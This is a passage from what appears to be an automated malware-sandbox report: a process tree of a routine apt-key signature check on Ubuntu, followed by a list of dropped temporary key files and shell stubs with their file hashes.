  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:2003
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:2005
- /bin/cp
  cp -a /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.orig.gpg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:2006
- /usr/bin/gpgv
  gpgv --homedir /tmp/apt-key-gpghome.aQCzlyhCLU --keyring /tmp/apt-key-gpghome.aQCzlyhCLU/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.ghSisV /tmp/apt.data.S0foTJ
  2⤵
  PID:2013
- /usr/bin/gpgconf
  gpgconf --kill all
  2⤵
  PID:2014
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart KILLAGENT
    3⤵
    PID:2015
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
    3⤵
    PID:2016
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
    3⤵
    PID:2017
- /bin/rm
  rm -rf /tmp/apt-key-gpghome.aQCzlyhCLU
  2⤵
  PID:2018

/usr/bin/sort
sort
1⤵
PID:1993

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:2009

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:2012

/bin/sh
sh -c "touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true"
1⤵
PID:2020

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/apt-key-gpghome.JW4YtzvHzt/gpg.1.sh

Filesize
82B

MD5
1a6cde3530fc7bfbb181fb32ee00f904

SHA1
e155b89f0ad39a9232b3c97c0950302aeff643d3

SHA256
c03cc6fd858d458ee1da6dc6343d2c2aac8afac764c23de8a7bae3b7b70d6ed0

SHA512
b23cffdfaf213494e99728393c919c98c1ca855eb9f442ded88d5130cfe29c17c35836d2b7ebf00fa3abf87e664cd4bfdf60d232869dc0c6a1c72d006e1d0c81

Download Submit
/tmp/apt-key-gpghome.JWaRO2lmI1/gpg.1.sh

Filesize
82B

MD5
a0f6a64c071d1629c20ae220ec3a2a65

SHA1
c26aced0c973e0cb3b3079b7e485a24429ba6ef4

SHA256
ed530b9ac4455b532c6147641d739026da5aba620537258f3445264d6a94dbfe

SHA512
b7cc639cf17290b6b2bc8a20ac259fc9362ebc671e256735b2d56ebdcec65a5d70f472e012eacbf27a73b7d10338ce817c18a60f0a95bdce1d493f2b9b2179f3

Download Submit
/tmp/apt-key-gpghome.YanZVww2GG/gpg.1.sh

Filesize
82B

MD5
37657a83fcbacc026879df4b9b0e4c05

SHA1
8cb6167fdaa1c71d285ab2bb074dc23e4b50a67d

SHA256
0b71bf36c34a23ed99b00c5d50b0ffa8cf753b77313704282c514d93225c258f

SHA512
6934c36d341e006eb3a6a88f5617244a971b5bb6c63484c8847c2d7230a652476e06203ae596577d9ef2a82185f2e6418c1f496fe23ec461a5c2b52ac3f39de2

Download Submit
/tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg

Filesize
2KB

MD5
79650cd189f35a29603fc43202d399ad

SHA1
e3bdd5aec56b59d5eaff3f60caf46a6786fc7ff8

SHA256
5321d780da31a1fa35c044470ef849a2f6244048855fdc4c22e527b6366a0ef7

SHA512
34bad6f9713c5837d3139dcb3a49239373fe5c242f31c3ca539888d16c2d5e63074c806e700553bdf9b6879e3c2b48c835a900df4ff8dfa96afd041d2357733e

Download Submit
/tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg

Filesize
5KB

MD5
34aa70714b28c0918716b6ce3bdb945e

SHA1
5c7cd1296bc98e2ea0e221beb45f8cbe65dd3016

SHA256
30ffc1b01e43be791a595d5125e9ce283b206ca8dd299ea2149ee01d7a39895e

SHA512
f06340e985e01e7aa3a03dc662f4a084c835f0a39e3af40616851d80bfc5948786cf10a403811fb5c46a98f949e7cfdfc1bb481a5bdfda9376812566dc55140d

Download Submit
/tmp/apt-key-gpghome.YanZVww2GG/pubring.gpg

Filesize
7KB

MD5
b3bf35c5e796db394a50f96b908b690f

SHA1
b1e90de4d9d88bac6c67926c0ff6263e3ef7c2d2

SHA256
cf419d6c58bea5f2586043ecbad4c44f27d6f6060e5be19993b857105a5be094

SHA512
a97f8881c83ddc681623e4f503f8f758afe85ae6c34e2339a635e9521ae1303aebb90a6bef7c1136b6bd2b7418facacf98643f24e8bb40f1f93fb8a8ef714a96

Download Submit
/tmp/apt-key-gpghome.aQCzlyhCLU/gpg.1.sh

Filesize
82B

MD5
730d818fb3b68cce086ae40c579aa8f9

SHA1
f3d51204fb52a787f247385e811fbeefce960ad1

SHA256
a404f044077ab7b5df0f1b167d1d2dba39d9a933d7e96e9df0b8713d7e359020

SHA512
f43fce0f075faabf60f56cd33efe67ea514137f16843f18bb4b67dff63478b8cd591853ec13994f557e4126f58a17715ece3331daa7372bbadf50af98cb3a6c5

Download Submit
/tmp/fileutl.message.XKz7hp

Filesize
235KB

MD5
373fe2f2ef99005d2550a482f09a3e51

SHA1
68e6572b55b1e77f7d171ebac7b2579b7a6bd51d

SHA256
7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5

SHA512
def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

Download Submit